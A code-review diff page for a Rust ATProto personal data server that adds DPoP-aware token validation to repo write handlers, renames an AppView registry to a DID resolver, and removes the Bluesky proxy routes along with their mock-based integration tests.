··· 56 state: &AppState, 57 headers: &HeaderMap, 58 repo_did: &str, 59 ) -> Result<(String, Uuid, Cid), Response> { 60 - let token = crate::auth::extract_bearer_token_from_header( 61 headers.get("Authorization").and_then(|h| h.to_str().ok()), 62 ) 63 .ok_or_else(|| { ··· 67 ) 68 .into_response() 69 })?; 70 - let auth_user = crate::auth::validate_bearer_token(&state.db, &token) 71 - .await 72 - .map_err(|_| { 73 - ( 74 - StatusCode::UNAUTHORIZED, 75 - Json(json!({"error": "AuthenticationFailed"})), 76 - ) 77 - .into_response() 78 - })?; 79 if repo_did != auth_user.did { 80 return Err(( 81 StatusCode::FORBIDDEN, ··· 172 pub async fn create_record( 173 State(state): State<AppState>, 174 headers: HeaderMap, 175 Json(input): Json<CreateRecordInput>, 176 ) -> Response { 177 let (did, user_id, current_root_cid) = 178 - match prepare_repo_write(&state, &headers, &input.repo).await { 179 Ok(res) => res, 180 Err(err_res) => return err_res, 181 }; ··· 339 pub async fn put_record( 340 State(state): State<AppState>, 341 headers: HeaderMap, 342 Json(input): Json<PutRecordInput>, 343 ) -> Response { 344 let (did, user_id, current_root_cid) = 345 - match prepare_repo_write(&state, &headers, &input.repo).await { 346 Ok(res) => res, 347 Err(err_res) => return err_res, 348 };
··· 56 state: &AppState, 57 headers: &HeaderMap, 58 repo_did: &str, 59 + http_method: &str, 60 + http_uri: &str, 61 ) -> Result<(String, Uuid, Cid), Response> { 62 + let extracted = crate::auth::extract_auth_token_from_header( 63 headers.get("Authorization").and_then(|h| h.to_str().ok()), 64 ) 65 .ok_or_else(|| { ··· 69 ) 70 .into_response() 71 })?; 72 + let dpop_proof = headers 73 + .get("DPoP") 74 + .and_then(|h| h.to_str().ok()); 75 + let auth_user = crate::auth::validate_token_with_dpop( 76 + &state.db, 77 + &extracted.token, 78 + extracted.is_dpop, 79 + dpop_proof, 80 + http_method, 81 + http_uri, 82 + false, 83 + ) 84 + .await 85 + .map_err(|e| { 86 + ( 87 + StatusCode::UNAUTHORIZED, 88 + Json(json!({"error": e.to_string()})), 89 + ) 90 + .into_response() 91 + })?; 92 if repo_did != auth_user.did { 93 return Err(( 94 StatusCode::FORBIDDEN, ··· 185 pub async fn create_record( 186 State(state): State<AppState>, 187 headers: HeaderMap, 188 + axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 189 Json(input): Json<CreateRecordInput>, 190 ) -> Response { 191 let (did, user_id, current_root_cid) = 192 + match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 193 Ok(res) => res, 194 Err(err_res) => return err_res, 195 }; ··· 353 pub async fn put_record( 354 State(state): State<AppState>, 355 headers: HeaderMap, 356 + axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 357 Json(input): Json<PutRecordInput>, 358 ) -> Response { 359 let (did, user_id, current_root_cid) = 360 + match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 361 Ok(res) => res, 362 Err(err_res) => return err_res, 363 };
+27 -145
src/appview/mod.rs
··· 1 use reqwest::Client; 2 use serde::{Deserialize, Serialize}; 3 use std::collections::HashMap; 4 use std::time::{Duration, Instant}; 5 use tokio::sync::RwLock; 6 use tracing::{debug, error, info, warn}; ··· 22 } 23 24 #[derive(Clone)] 25 - struct CachedAppView { 26 url: String, 27 did: String, 28 resolved_at: Instant, 29 } 30 31 - pub struct AppViewRegistry { 32 - namespace_to_did: HashMap<String, String>, 33 - did_cache: RwLock<HashMap<String, CachedAppView>>, 34 client: Client, 35 cache_ttl: Duration, 36 plc_directory_url: String, 37 } 38 39 - impl Clone for AppViewRegistry { 40 fn clone(&self) -> Self { 41 Self { 42 - namespace_to_did: self.namespace_to_did.clone(), 43 did_cache: RwLock::new(HashMap::new()), 44 client: self.client.clone(), 45 cache_ttl: self.cache_ttl, ··· 48 } 49 } 50 51 - #[derive(Debug, Clone)] 52 - pub struct ResolvedAppView { 53 - pub url: String, 54 - pub did: String, 55 - } 56 - 57 - impl AppViewRegistry { 58 pub fn new() -> Self { 59 - let mut namespace_to_did = HashMap::new(); 60 - 61 - let bsky_did = std::env::var("APPVIEW_DID_BSKY") 62 - .unwrap_or_else(|_| "did:web:api.bsky.app".to_string()); 63 - namespace_to_did.insert("app.bsky".to_string(), bsky_did.clone()); 64 - namespace_to_did.insert("com.atproto".to_string(), bsky_did); 65 - 66 - for (key, value) in std::env::vars() { 67 - if let Some(namespace) = key.strip_prefix("APPVIEW_DID_") { 68 - let namespace = namespace.to_lowercase().replace('_', "."); 69 - if namespace != "bsky" { 70 - namespace_to_did.insert(namespace, value); 71 - } 72 - } 73 - } 74 - 75 - let cache_ttl_secs: u64 = std::env::var("APPVIEW_CACHE_TTL_SECS") 76 .ok() 77 .and_then(|v| v.parse().ok()) 78 .unwrap_or(300); ··· 87 .build() 88 .unwrap_or_else(|_| Client::new()); 89 90 - info!( 91 - "AppView registry initialized with {} namespace mappings", 92 - namespace_to_did.len() 93 - ); 94 - for (ns, did) in &namespace_to_did { 95 - debug!(" {} -> {}", ns, did); 96 - } 97 98 Self { 99 - namespace_to_did, 100 did_cache: RwLock::new(HashMap::new()), 101 client, 102 cache_ttl: Duration::from_secs(cache_ttl_secs), ··· 104 } 105 } 106 107 - pub fn register_namespace(&mut self, namespace: &str, did: &str) { 108 - info!("Registering AppView: {} -> {}", namespace, did); 109 - self.namespace_to_did 110 - .insert(namespace.to_string(), did.to_string()); 111 - } 112 - 113 - pub async fn get_appview_for_method(&self, method: &str) -> Option<ResolvedAppView> { 114 - let namespace = self.extract_namespace(method)?; 115 - self.get_appview_for_namespace(&namespace).await 116 - } 117 - 118 - pub async fn get_appview_for_namespace(&self, namespace: &str) -> Option<ResolvedAppView> { 119 - let did = self.get_did_for_namespace(namespace)?; 120 - self.resolve_appview_did(&did).await 121 - } 122 - 123 - pub fn get_did_for_namespace(&self, namespace: &str) -> Option<String> { 124 - if let Some(did) = self.namespace_to_did.get(namespace) { 125 - return Some(did.clone()); 126 - } 127 - 128 - let mut parts: Vec<&str> = namespace.split('.').collect(); 129 - while !parts.is_empty() { 130 - let prefix = parts.join("."); 131 - if let Some(did) = self.namespace_to_did.get(&prefix) { 132 - return Some(did.clone()); 133 - } 134 - parts.pop(); 135 - } 136 - 137 - None 138 - } 139 - 140 - pub async fn resolve_appview_did(&self, did: &str) -> Option<ResolvedAppView> { 141 { 142 let cache = self.did_cache.read().await; 143 if let Some(cached) = cache.get(did) { 144 if cached.resolved_at.elapsed() < self.cache_ttl { 145 - return Some(ResolvedAppView { 146 url: cached.url.clone(), 147 did: cached.did.clone(), 148 }); ··· 156 let mut cache = self.did_cache.write().await; 157 cache.insert( 158 did.to_string(), 159 - CachedAppView { 160 url: resolved.url.clone(), 161 did: resolved.did.clone(), 162 resolved_at: Instant::now(), ··· 167 Some(resolved) 168 } 169 170 - async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedAppView> { 171 let did_doc = if did.starts_with("did:web:") { 172 self.resolve_did_web(did).await 173 } else if did.starts_with("did:plc:") { ··· 185 } 186 }; 187 188 - self.extract_appview_endpoint(&doc) 189 } 190 191 async fn resolve_did_web(&self, did: &str) -> Result<DidDocument, String> { ··· 275 .map_err(|e| format!("Failed to parse DID document: {}", e)) 276 } 277 278 - fn extract_appview_endpoint(&self, doc: &DidDocument) -> Option<ResolvedAppView> { 279 for service in &doc.service { 280 if service.service_type == "AtprotoAppView" 281 || service.id.contains("atproto_appview") 282 || service.id.ends_with("#bsky_appview") 283 { 284 - return Some(ResolvedAppView { 285 url: service.service_endpoint.clone(), 286 did: doc.id.clone(), 287 }); ··· 290 291 for service in &doc.service { 292 if service.service_type.contains("AppView") || service.id.contains("appview") { 293 - return Some(ResolvedAppView { 294 url: service.service_endpoint.clone(), 295 did: doc.id.clone(), 296 }); ··· 303 "No explicit AppView service found for {}, using first service: {}", 304 doc.id, service.service_endpoint 305 ); 306 - return Some(ResolvedAppView { 307 url: service.service_endpoint.clone(), 308 did: doc.id.clone(), 309 }); ··· 326 "No service found for {}, deriving URL from DID: {}://{}", 327 doc.id, scheme, base_host 328 ); 329 - return Some(ResolvedAppView { 330 url: format!("{}://{}", scheme, base_host), 331 did: doc.id.clone(), 332 }); ··· 335 None 336 } 337 338 - fn extract_namespace(&self, method: &str) -> Option<String> { 339 - let parts: Vec<&str> = method.split('.').collect(); 340 - if parts.len() >= 2 { 341 - Some(format!("{}.{}", parts[0], parts[1])) 342 - } else { 343 - None 344 - } 345 - } 346 - 347 - pub fn list_namespaces(&self) -> Vec<(String, String)> { 348 - self.namespace_to_did 349 - .iter() 350 - .map(|(k, v)| (k.clone(), v.clone())) 351 - .collect() 352 - } 353 - 354 pub async fn invalidate_cache(&self, did: &str) { 355 let mut cache = self.did_cache.write().await; 356 cache.remove(did); 357 } 358 - 359 - pub async fn invalidate_all_cache(&self) { 360 - let mut cache = self.did_cache.write().await; 361 - cache.clear(); 362 - } 363 } 364 365 - impl Default for AppViewRegistry { 366 fn default() -> Self { 367 Self::new() 368 } 369 } 370 371 - pub async fn get_appview_url_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> { 372 - registry.get_appview_for_method(method).await.map(|r| r.url) 373 - } 374 - 375 - pub async fn get_appview_did_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> { 376 - registry.get_appview_for_method(method).await.map(|r| r.did) 377 - } 378 - 379 - #[cfg(test)] 380 - mod tests { 381 - use super::*; 382 - 383 - #[test] 384 - fn test_extract_namespace() { 385 - let registry = AppViewRegistry::new(); 386 - assert_eq!( 387 - registry.extract_namespace("app.bsky.actor.getProfile"), 388 - Some("app.bsky".to_string()) 389 - ); 390 - assert_eq!( 391 - registry.extract_namespace("com.atproto.repo.createRecord"), 392 - Some("com.atproto".to_string()) 393 - ); 394 - assert_eq!( 395 - registry.extract_namespace("com.whtwnd.blog.getPost"), 396 - Some("com.whtwnd".to_string()) 397 - ); 398 - assert_eq!(registry.extract_namespace("invalid"), None); 399 - } 400 - 401 - #[test] 402 - fn test_get_did_for_namespace() { 403 - let mut registry = AppViewRegistry::new(); 404 - registry.register_namespace("com.whtwnd", "did:web:whtwnd.com"); 405 - 406 - assert!(registry.get_did_for_namespace("app.bsky").is_some()); 407 - assert_eq!( 408 - registry.get_did_for_namespace("com.whtwnd"), 409 - Some("did:web:whtwnd.com".to_string()) 410 - ); 411 - assert!(registry.get_did_for_namespace("unknown.namespace").is_none()); 412 - } 413 }
··· 1 use reqwest::Client; 2 use serde::{Deserialize, Serialize}; 3 use std::collections::HashMap; 4 + use std::sync::Arc; 5 use std::time::{Duration, Instant}; 6 use tokio::sync::RwLock; 7 use tracing::{debug, error, info, warn}; ··· 23 } 24 25 #[derive(Clone)] 26 + struct CachedDid { 27 url: String, 28 did: String, 29 resolved_at: Instant, 30 } 31 32 + #[derive(Debug, Clone)] 33 + pub struct ResolvedService { 34 + pub url: String, 35 + pub did: String, 36 + } 37 + 38 + pub struct DidResolver { 39 + did_cache: RwLock<HashMap<String, CachedDid>>, 40 client: Client, 41 cache_ttl: Duration, 42 plc_directory_url: String, 43 } 44 45 + impl Clone for DidResolver { 46 fn clone(&self) -> Self { 47 Self { 48 did_cache: RwLock::new(HashMap::new()), 49 client: self.client.clone(), 50 cache_ttl: self.cache_ttl, ··· 53 } 54 } 55 56 + impl DidResolver { 57 pub fn new() -> Self { 58 + let cache_ttl_secs: u64 = std::env::var("DID_CACHE_TTL_SECS") 59 .ok() 60 .and_then(|v| v.parse().ok()) 61 .unwrap_or(300); ··· 70 .build() 71 .unwrap_or_else(|_| Client::new()); 72 73 + info!("DID resolver initialized"); 74 75 Self { 76 did_cache: RwLock::new(HashMap::new()), 77 client, 78 cache_ttl: Duration::from_secs(cache_ttl_secs), ··· 80 } 81 } 82 83 + pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> { 84 { 85 let cache = self.did_cache.read().await; 86 if let Some(cached) = cache.get(did) { 87 if cached.resolved_at.elapsed() < self.cache_ttl { 88 + return Some(ResolvedService { 89 url: cached.url.clone(), 90 did: cached.did.clone(), 91 }); ··· 99 let mut cache = self.did_cache.write().await; 100 cache.insert( 101 did.to_string(), 102 + CachedDid { 103 url: resolved.url.clone(), 104 did: resolved.did.clone(), 105 resolved_at: Instant::now(), ··· 110 Some(resolved) 111 } 112 113 + async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedService> { 114 let did_doc = if did.starts_with("did:web:") { 115 self.resolve_did_web(did).await 116 } else if did.starts_with("did:plc:") { ··· 128 } 129 }; 130 131 + self.extract_service_endpoint(&doc) 132 } 133 134 async fn resolve_did_web(&self, did: &str) -> Result<DidDocument, String> { ··· 218 .map_err(|e| format!("Failed to parse DID document: {}", e)) 219 } 220 221 + fn extract_service_endpoint(&self, doc: &DidDocument) -> Option<ResolvedService> { 222 for service in &doc.service { 223 if service.service_type == "AtprotoAppView" 224 || service.id.contains("atproto_appview") 225 || service.id.ends_with("#bsky_appview") 226 { 227 + return Some(ResolvedService { 228 url: service.service_endpoint.clone(), 229 did: doc.id.clone(), 230 }); ··· 233 234 for service in &doc.service { 235 if service.service_type.contains("AppView") || service.id.contains("appview") { 236 + return Some(ResolvedService { 237 url: service.service_endpoint.clone(), 238 did: doc.id.clone(), 239 }); ··· 246 "No explicit AppView service found for {}, using first service: {}", 247 doc.id, service.service_endpoint 248 ); 249 + return Some(ResolvedService { 250 url: service.service_endpoint.clone(), 251 did: doc.id.clone(), 252 }); ··· 269 "No service found for {}, deriving URL from DID: {}://{}", 270 doc.id, scheme, base_host 271 ); 272 + return Some(ResolvedService { 273 url: format!("{}://{}", scheme, base_host), 274 did: doc.id.clone(), 275 }); ··· 278 None 279 } 280 281 pub async fn invalidate_cache(&self, did: &str) { 282 let mut cache = self.did_cache.write().await; 283 cache.remove(did); 284 } 285 } 286 287 + impl Default for DidResolver { 288 fn default() -> Self { 289 Self::new() 290 } 291 } 292 293 + pub fn create_did_resolver() -> Arc<DidResolver> { 294 + Arc::new(DidResolver::new()) 295 }
-29
src/lib.rs
··· 317 "/xrpc/app.bsky.actor.putPreferences", 318 post(api::actor::put_preferences), 319 ) 320 - .route( 321 - "/xrpc/app.bsky.actor.getProfile", 322 - get(api::actor::get_profile), 323 - ) 324 - .route( 325 - "/xrpc/app.bsky.actor.getProfiles", 326 - get(api::actor::get_profiles), 327 - ) 328 - .route( 329 - "/xrpc/app.bsky.feed.getTimeline", 330 - get(api::feed::get_timeline), 331 - ) 332 - .route( 333 - "/xrpc/app.bsky.feed.getAuthorFeed", 334 - get(api::feed::get_author_feed), 335 - ) 336 - .route( 337 - "/xrpc/app.bsky.feed.getActorLikes", 338 - get(api::feed::get_actor_likes), 339 - ) 340 - .route( 341 - "/xrpc/app.bsky.feed.getPostThread", 342 - get(api::feed::get_post_thread), 343 - ) 344 - .route("/xrpc/app.bsky.feed.getFeed", get(api::feed::get_feed)) 345 - .route( 346 - "/xrpc/app.bsky.notification.registerPush", 347 - post(api::notification::register_push), 348 - ) 349 .route("/.well-known/did.json", get(api::identity::well_known_did)) 350 .route( 351 "/.well-known/atproto-did",
··· 317 "/xrpc/app.bsky.actor.putPreferences", 318 post(api::actor::put_preferences), 319 ) 320 .route("/.well-known/did.json", get(api::identity::well_known_did)) 321 .route( 322 "/.well-known/atproto-did",
+4 -4
src/state.rs
··· 1 - use crate::appview::AppViewRegistry; 2 use crate::cache::{Cache, DistributedRateLimiter, create_cache}; 3 use crate::circuit_breaker::CircuitBreakers; 4 use crate::config::AuthConfig; ··· 20 pub circuit_breakers: Arc<CircuitBreakers>, 21 pub cache: Arc<dyn Cache>, 22 pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>, 23 - pub appview_registry: Arc<AppViewRegistry>, 24 } 25 26 pub enum RateLimitKind { ··· 87 let rate_limiters = Arc::new(RateLimiters::new()); 88 let circuit_breakers = Arc::new(CircuitBreakers::new()); 89 let (cache, distributed_rate_limiter) = create_cache().await; 90 - let appview_registry = Arc::new(AppViewRegistry::new()); 91 92 Self { 93 db, ··· 98 circuit_breakers, 99 cache, 100 distributed_rate_limiter, 101 - appview_registry, 102 } 103 } 104
··· 1 + use crate::appview::DidResolver; 2 use crate::cache::{Cache, DistributedRateLimiter, create_cache}; 3 use crate::circuit_breaker::CircuitBreakers; 4 use crate::config::AuthConfig; ··· 20 pub circuit_breakers: Arc<CircuitBreakers>, 21 pub cache: Arc<dyn Cache>, 22 pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>, 23 + pub did_resolver: Arc<DidResolver>, 24 } 25 26 pub enum RateLimitKind { ··· 87 let rate_limiters = Arc::new(RateLimiters::new()); 88 let circuit_breakers = Arc::new(CircuitBreakers::new()); 89 let (cache, distributed_rate_limiter) = create_cache().await; 90 + let did_resolver = Arc::new(DidResolver::new()); 91 92 Self { 93 db, ··· 98 circuit_breakers, 99 cache, 100 distributed_rate_limiter, 101 + did_resolver, 102 } 103 } 104
+3 -2
tests/account_notifications.rs
··· 170 let pool = get_pool().await; 171 let (token, did) = create_account_and_login(&client).await; 172 173 let prefs = json!({ 174 - "email": "newemail@example.com" 175 }); 176 let resp = client 177 .post(format!("{}/xrpc/com.bspds.account.updateNotificationPrefs", base)) ··· 217 .await 218 .unwrap(); 219 let body: Value = resp.json().await.unwrap(); 220 - assert_eq!(body["email"], "newemail@example.com"); 221 }
··· 170 let pool = get_pool().await; 171 let (token, did) = create_account_and_login(&client).await; 172 173 + let unique_email = format!("newemail_{}@example.com", uuid::Uuid::new_v4()); 174 let prefs = json!({ 175 + "email": unique_email 176 }); 177 let resp = client 178 .post(format!("{}/xrpc/com.bspds.account.updateNotificationPrefs", base)) ··· 218 .await 219 .unwrap(); 220 let body: Value = resp.json().await.unwrap(); 221 + assert_eq!(body["email"], unique_email); 222 }
+3 -2
tests/admin_search.rs
··· 12 let (user_did, _) = setup_new_user("search-target").await; 13 let res = client 14 .get(format!( 15 - "{}/xrpc/com.atproto.admin.searchAccounts", 16 base_url().await 17 )) 18 .bearer_auth(&admin_jwt) ··· 24 let accounts = body["accounts"].as_array().expect("accounts should be array"); 25 assert!(!accounts.is_empty(), "Should return some accounts"); 26 let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did)); 27 - assert!(found, "Should find the created user in results"); 28 } 29 30 #[tokio::test] ··· 111 #[tokio::test] 112 async fn test_search_accounts_requires_admin() { 113 let client = client(); 114 let (_, user_jwt) = setup_new_user("search-nonadmin").await; 115 let res = client 116 .get(format!(
··· 12 let (user_did, _) = setup_new_user("search-target").await; 13 let res = client 14 .get(format!( 15 + "{}/xrpc/com.atproto.admin.searchAccounts?limit=1000", 16 base_url().await 17 )) 18 .bearer_auth(&admin_jwt) ··· 24 let accounts = body["accounts"].as_array().expect("accounts should be array"); 25 assert!(!accounts.is_empty(), "Should return some accounts"); 26 let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did)); 27 + assert!(found, "Should find the created user in results (DID: {})", user_did); 28 } 29 30 #[tokio::test] ··· 111 #[tokio::test] 112 async fn test_search_accounts_requires_admin() { 113 let client = client(); 114 + let _ = create_account_and_login(&client).await; 115 let (_, user_jwt) = setup_new_user("search-nonadmin").await; 116 let res = client 117 .get(format!(
-135
tests/appview_integration.rs
··· 1 - mod common; 2 - 3 - use common::{base_url, client, create_account_and_login}; 4 - use reqwest::StatusCode; 5 - use serde_json::{Value, json}; 6 - 7 - #[tokio::test] 8 - async fn test_get_author_feed_returns_appview_data() { 9 - let client = client(); 10 - let base = base_url().await; 11 - let (jwt, did) = create_account_and_login(&client).await; 12 - let res = client 13 - .get(format!( 14 - "{}/xrpc/app.bsky.feed.getAuthorFeed?actor={}", 15 - base, did 16 - )) 17 - .header("Authorization", format!("Bearer {}", jwt)) 18 - .send() 19 - .await 20 - .unwrap(); 21 - assert_eq!(res.status(), StatusCode::OK); 22 - let body: Value = res.json().await.unwrap(); 23 - assert!(body["feed"].is_array(), "Response should have feed array"); 24 - let feed = body["feed"].as_array().unwrap(); 25 - assert_eq!(feed.len(), 1, "Feed should have 1 post from appview"); 26 - assert_eq!( 27 - feed[0]["post"]["record"]["text"].as_str(), 28 - Some("Author feed post from appview"), 29 - "Post text should match appview response" 30 - ); 31 - } 32 - 33 - #[tokio::test] 34 - async fn test_get_actor_likes_returns_appview_data() { 35 - let client = client(); 36 - let base = base_url().await; 37 - let (jwt, did) = create_account_and_login(&client).await; 38 - let res = client 39 - .get(format!( 40 - "{}/xrpc/app.bsky.feed.getActorLikes?actor={}", 41 - base, did 42 - )) 43 - .header("Authorization", format!("Bearer {}", jwt)) 44 - .send() 45 - .await 46 - .unwrap(); 47 - assert_eq!(res.status(), StatusCode::OK); 48 - let body: Value = res.json().await.unwrap(); 49 - assert!(body["feed"].is_array(), "Response should have feed array"); 50 - let feed = body["feed"].as_array().unwrap(); 51 - assert_eq!(feed.len(), 1, "Feed should have 1 liked post from appview"); 52 - assert_eq!( 53 - feed[0]["post"]["record"]["text"].as_str(), 54 - Some("Liked post from appview"), 55 - "Post text should match appview response" 56 - ); 57 - } 58 - 59 - #[tokio::test] 60 - async fn test_get_post_thread_returns_appview_data() { 61 - let client = client(); 62 - let base = base_url().await; 63 - let (jwt, did) = create_account_and_login(&client).await; 64 - let res = client 65 - .get(format!( 66 - "{}/xrpc/app.bsky.feed.getPostThread?uri=at://{}/app.bsky.feed.post/test123", 67 - base, did 68 - )) 69 - .header("Authorization", format!("Bearer {}", jwt)) 70 - .send() 71 - .await 72 - .unwrap(); 73 - assert_eq!(res.status(), StatusCode::OK); 74 - let body: Value = res.json().await.unwrap(); 75 - assert!( 76 - body["thread"].is_object(), 77 - "Response should have thread object" 78 - ); 79 - assert_eq!( 80 - body["thread"]["$type"].as_str(), 81 - Some("app.bsky.feed.defs#threadViewPost"), 82 - "Thread should be a threadViewPost" 83 - ); 84 - assert_eq!( 85 - body["thread"]["post"]["record"]["text"].as_str(), 86 - Some("Thread post from appview"), 87 - "Post text should match appview response" 88 - ); 89 - } 90 - 91 - #[tokio::test] 92 - async fn test_get_feed_returns_appview_data() { 93 - let client = client(); 94 - let base = base_url().await; 95 - let (jwt, _did) = create_account_and_login(&client).await; 96 - let res = client 97 - .get(format!( 98 - "{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test", 99 - base 100 - )) 101 - .header("Authorization", format!("Bearer {}", jwt)) 102 - .send() 103 - .await 104 - .unwrap(); 105 - assert_eq!(res.status(), StatusCode::OK); 106 - let body: Value = res.json().await.unwrap(); 107 - assert!(body["feed"].is_array(), "Response should have feed array"); 108 - let feed = body["feed"].as_array().unwrap(); 109 - assert_eq!(feed.len(), 1, "Feed should have 1 post from appview"); 110 - assert_eq!( 111 - feed[0]["post"]["record"]["text"].as_str(), 112 - Some("Custom feed post from appview"), 113 - "Post text should match appview response" 114 - ); 115 - } 116 - 117 - #[tokio::test] 118 - async fn test_register_push_proxies_to_appview() { 119 - let client = client(); 120 - let base = base_url().await; 121 - let (jwt, _did) = create_account_and_login(&client).await; 122 - let res = client 123 - .post(format!("{}/xrpc/app.bsky.notification.registerPush", base)) 124 - .header("Authorization", format!("Bearer {}", jwt)) 125 - .json(&json!({ 126 - "serviceDid": "did:web:example.com", 127 - "token": "test-push-token", 128 - "platform": "ios", 129 - "appId": "xyz.bsky.app" 130 - })) 131 - .send() 132 - .await 133 - .unwrap(); 134 - assert_eq!(res.status(), StatusCode::OK); 135 - }
···
+1 -134
tests/common/mod.rs
··· 141 let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri); 142 let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A")); 143 setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await; 144 - unsafe { 145 - std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did); 146 - } 147 MOCK_APPVIEW.set(mock_server).ok(); 148 spawn_app(database_url).await 149 } ··· 194 let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri); 195 let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A")); 196 setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await; 197 - unsafe { 198 - std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did); 199 - } 200 MOCK_APPVIEW.set(mock_server).ok(); 201 S3_CONTAINER.set(s3_container).ok(); 202 let container = Postgres::default() ··· 238 .await; 239 } 240 241 - async fn setup_mock_appview(mock_server: &MockServer) { 242 - Mock::given(method("GET")) 243 - .and(path("/xrpc/app.bsky.actor.getProfile")) 244 - .respond_with(ResponseTemplate::new(200).set_body_json(json!({ 245 - "handle": "mock.handle", 246 - "did": "did:plc:mock", 247 - "displayName": "Mock User" 248 - }))) 249 - .mount(mock_server) 250 - .await; 251 - Mock::given(method("GET")) 252 - .and(path("/xrpc/app.bsky.actor.searchActors")) 253 - .respond_with(ResponseTemplate::new(200).set_body_json(json!({ 254 - "actors": [], 255 - "cursor": null 256 - }))) 257 - .mount(mock_server) 258 - .await; 259 - Mock::given(method("GET")) 260 - .and(path("/xrpc/app.bsky.feed.getTimeline")) 261 - .respond_with( 262 - ResponseTemplate::new(200) 263 - .insert_header("atproto-repo-rev", "0") 264 - .set_body_json(json!({ 265 - "feed": [], 266 - "cursor": null 267 - })), 268 - ) 269 - .mount(mock_server) 270 - .await; 271 - Mock::given(method("GET")) 272 - .and(path("/xrpc/app.bsky.feed.getAuthorFeed")) 273 - .respond_with( 274 - ResponseTemplate::new(200) 275 - .insert_header("atproto-repo-rev", "0") 276 - .set_body_json(json!({ 277 - "feed": [{ 278 - "post": { 279 - "uri": "at://did:plc:mock-author/app.bsky.feed.post/from-appview-author", 280 - "cid": "bafyappview123", 281 - "author": {"did": "did:plc:mock-author", "handle": "mock.author"}, 282 - "record": { 283 - "$type": "app.bsky.feed.post", 284 - "text": "Author feed post from appview", 285 - "createdAt": "2025-01-01T00:00:00Z" 286 - }, 287 - "indexedAt": "2025-01-01T00:00:00Z" 288 - } 289 - }], 290 - "cursor": "author-cursor" 291 - })), 292 - ) 293 - .mount(mock_server) 294 - .await; 295 - Mock::given(method("GET")) 296 - .and(path("/xrpc/app.bsky.feed.getActorLikes")) 297 - .respond_with( 298 - ResponseTemplate::new(200) 299 - .insert_header("atproto-repo-rev", "0") 300 - .set_body_json(json!({ 301 - "feed": [{ 302 - "post": { 303 - "uri": "at://did:plc:mock-likes/app.bsky.feed.post/liked-post", 304 - "cid": "bafyliked123", 305 - "author": {"did": "did:plc:mock-likes", "handle": "mock.likes"}, 306 - "record": { 307 - "$type": "app.bsky.feed.post", 308 - "text": "Liked post from appview", 309 - "createdAt": "2025-01-01T00:00:00Z" 310 - }, 311 - "indexedAt": "2025-01-01T00:00:00Z" 312 - } 313 - }], 314 - "cursor": null 315 - })), 316 - ) 317 - .mount(mock_server) 318 - .await; 319 - Mock::given(method("GET")) 320 - .and(path("/xrpc/app.bsky.feed.getPostThread")) 321 - .respond_with( 322 - ResponseTemplate::new(200) 323 - .insert_header("atproto-repo-rev", "0") 324 - .set_body_json(json!({ 325 - "thread": { 326 - "$type": "app.bsky.feed.defs#threadViewPost", 327 - "post": { 328 - "uri": "at://did:plc:mock/app.bsky.feed.post/thread-post", 329 - "cid": "bafythread123", 330 - "author": {"did": "did:plc:mock", "handle": "mock.handle"}, 331 - "record": { 332 - "$type": "app.bsky.feed.post", 333 - "text": "Thread post from appview", 334 - "createdAt": "2025-01-01T00:00:00Z" 335 - }, 336 - "indexedAt": "2025-01-01T00:00:00Z" 337 - }, 338 - "replies": [] 339 - } 340 - })), 341 - ) 342 - .mount(mock_server) 343 - .await; 344 - Mock::given(method("GET")) 345 - .and(path("/xrpc/app.bsky.feed.getFeed")) 346 - .respond_with(ResponseTemplate::new(200).set_body_json(json!({ 347 - "feed": [{ 348 - "post": { 349 - "uri": "at://did:plc:mock-feed/app.bsky.feed.post/custom-feed-post", 350 - "cid": "bafyfeed123", 351 - "author": {"did": "did:plc:mock-feed", "handle": "mock.feed"}, 352 - "record": { 353 - "$type": "app.bsky.feed.post", 354 - "text": "Custom feed post from appview", 355 - "createdAt": "2025-01-01T00:00:00Z" 356 - }, 357 - "indexedAt": "2025-01-01T00:00:00Z" 358 - } 359 - }], 360 - "cursor": null 361 - }))) 362 - .mount(mock_server) 363 - .await; 364 - Mock::given(method("POST")) 365 - .and(path("/xrpc/app.bsky.notification.registerPush")) 366 - .respond_with(ResponseTemplate::new(200)) 367 - .mount(mock_server) 368 - .await; 369 } 370 371 async fn spawn_app(database_url: String) -> String {
··· 141 let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri); 142 let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A")); 143 setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await; 144 MOCK_APPVIEW.set(mock_server).ok(); 145 spawn_app(database_url).await 146 } ··· 191 let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri); 192 let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A")); 193 setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await; 194 MOCK_APPVIEW.set(mock_server).ok(); 195 S3_CONTAINER.set(s3_container).ok(); 196 let container = Postgres::default() ··· 232 .await; 233 } 234 235 + async fn setup_mock_appview(_mock_server: &MockServer) { 236 } 237 238 async fn spawn_app(database_url: String) -> String {
-104
tests/feed.rs
